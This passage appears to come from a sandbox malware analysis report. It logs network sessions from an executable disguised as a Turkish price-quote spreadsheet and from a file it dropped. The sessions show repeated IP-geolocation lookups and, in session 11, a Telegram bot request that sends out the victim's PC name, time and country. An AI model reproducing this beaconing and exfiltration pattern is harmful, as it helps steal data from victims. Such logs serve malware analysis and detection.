States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 07:00:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49733	188.114.96.3	443	7360	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 07:00:33 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-26 07:00:33 UTC	676	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:00:33 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 86092 Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eC4dukqMgksB49L3xyuTchlBvQ%2FbY0vynfhIGEjpR6yw1T05X1d4qLVqwYC18AOyW5XFClQ1M4UtxiAAWhKl9Iz%2BgzFsDk0n4k17PS3R3Si8j%2FK2bUzBbjKBj2Y27y3iRoGGoqC3"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c9160afcb5b8c45-EWR
2024-09-26 07:00:33 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 07:00:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49735	188.114.96.3	443	7732	C:\Users\user\AppData\Roaming\OnCgVRIhY.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 07:00:35 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-26 07:00:35 UTC	718	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:00:35 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 86094 Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pT521myJto2%2Bi3HN5p%2FxK4BhU9XLXJ2DMrysRu4tPP%2B7uFXsPpOxhoIToo9c4vNUp%2FymVKmqnbn%2FMlGlrLZSBGOhdbU1n7bUaD7eW9rZrx6%2F%2FsbJNLGPFLUHv37%2BqCP%2Fh71Ytt4k"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c9160b8ac8c1a34-EWR alt-svc: h3=":443"; ma=86400
2024-09-26 07:00:35 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 07:00:35 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49736	188.114.96.3	443	7360	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 07:00:35 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-09-26 07:00:35 UTC	680	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:00:35 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 86094 Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KmaHO6uWf2m6A3%2FFl%2BbRABfpM1X1s3Mv3ci8J88PWGdpylVqDXmtQpZfplAaGgvBeoAHydEbgh1A05VuEM4nLTqApg4qCD4QqAgQ8rSTE2Jzbon7nfDSmbpI%2FQcEo%2FDd%2FICFtAZ1"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c9160bb69f14295-EWR
2024-09-26 07:00:35 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 07:00:35 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49738	149.154.167.220	443	7360	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 07:00:36 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216865%0D%0ADate%20and%20Time:%2026/09/2024%20/%2022:26:13%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216865%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-09-26 07:00:36 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 26 Sep 2024 07:00:36 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-26 07:00:36 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49739	188.114.96.3	443	7732	C:\Users\user\AppData\Roaming\OnCgVRIhY.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 07:00:37 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-26 07:00:37 UTC	678	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:00:37 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 86096 Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aTJvId9Aiu7tlacGEhZvXLrSw0Sbu4JE1K8yB32PuOjPUfTygrZr0WB5XXR4Hi%2F%2FDTYnBD33RppdLYJUMecL7bnGNfeXS%2FDAtiajjRMnY5elWiJ7GubDFqbpscny46VdeuB%2BoDfb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c9160c8fa2943e8-EWR
2024-09-26 07:00:37 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 07:00:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49741	188.114.96.3	443	7732	C:\Users\user\AppData\Roaming\OnCgVRIhY.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 07:00:39 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-26 07:00:40 UTC	674	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:00:40 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 86099 Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=InksmgI%2Fq7jZuLcCT1ISlsnxnmbK2lxXkoT9HkzeD9tzKRpyQbSrHT%2FojAsyH2uDEOWHUtaYWvWm63viBwaPUJeCdw9qpWxq7z1rgLhD7yoTjf0AR25iG5qRxqdn63EZyLHa6u4c"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c9160d67c935e6e-EWR
2024-09-26 07:00:40 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 07:00:40 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49743	188.114.96.3	443	7732	C:\Users\user\AppData\Roaming\OnCgVRIhY.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 07:00:41 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-26 07:00:41 UTC	674	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:00:41 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 86100 Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Cy6GpxpmoBgJCZ1u7MaEg94kdwbyzimDxQihD62fY8NUgZCQOJFQ73aee37fiB%2BHK6NtzzhhCdamGqX1FOkmR6dnuKHXu8kH0XUi9qAW%2FAhm2Cvenm0AV3C0se0KAtuXDfKyzxyI"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c9160e049228cc3-EWR
2024-09-26 07:00:41 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 07:00:41 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49745	188.114.96.3	443	7732	C:\Users\user\AppData\Roaming\OnCgVRIhY.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 07:00:43 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-09-26 07:00:44 UTC	678	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:00:43 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 86102 Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T1ZcqxqXcr1JATg4VuVceE0NzIdfm423iJ3MnWeV77TrCuHxaXwEEU5jlckBxV83wLg5ngV3x%2F%2FBUlZ8oPAFk1ibjsP%2FJ%2B4nb3Dkcun4NcnlSmU8R9tIpU9KmWgtmRS8RccxeCOM"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c9160eeaca60f65-EWR
2024-09-26 07:00:44 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 07:00:44 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49747	188.114.96.3	443	7732	C:\Users\user\AppData\Roaming\OnCgVRIhY.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 07:00:45 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-09-26 07:00:45 UTC	682	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:00:45 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 86104 Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8HudjMOnd3hrH1qNM2TmmwdF90dkfOrwWsHOEkI4JSE4u4xcgGLp7OkDV8Q2LuDw79LUAx1CHa%2Be75b5661f%2FeI9d4Ss8aH%2Fa1il%2Bf0hnc85ZpnkvZ%2Fbz9JdhFfn%2F8dnpmmNDzj7"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c9160f809f94364-EWR
2024-09-26 07:00:45 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 07:00:45 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49749	188.114.96.3	443	7732	C:\Users\user\AppData\Roaming\OnCgVRIhY.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 07:00:47 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-09-26 07:00:47 UTC	672	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:00:47 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 86106 Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dVWgVjuXqyE4EOZgRpnDQqli8WKZbcqvPcJUte8wgyVz62T1vq1h8Ki%2F3nd0zW2rvSfjgfJK75ebdXwFBWikf2ycO30Ie0r2tnDuKYKlMo8RIsjjxrML0Lnf9kGfHA1UDK4TitLg"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c916104dc36197c-EWR
2024-09-26 07:00:47 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 07:00:47 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49751	188.114.96.3	443	7732	C:\Users\user\AppData\Roaming\OnCgVRIhY.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 07:00:48 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-26 07:00:49 UTC	676	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:00:48 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 86107 Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6fG7m1wp3WlWN4mTT4pc3jSAz%2Buhe58Ic7MtovBanhRrSPAcRF1YbTMRb1dIwS%2FMlWNDZFOFs%2BVLzGMNRUjWVIqZadpCryqrc1SGT36jfYB7NiBKUe0Tfy0k5nmIdS9SiqAMcupr"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c91610e0874440b-EWR
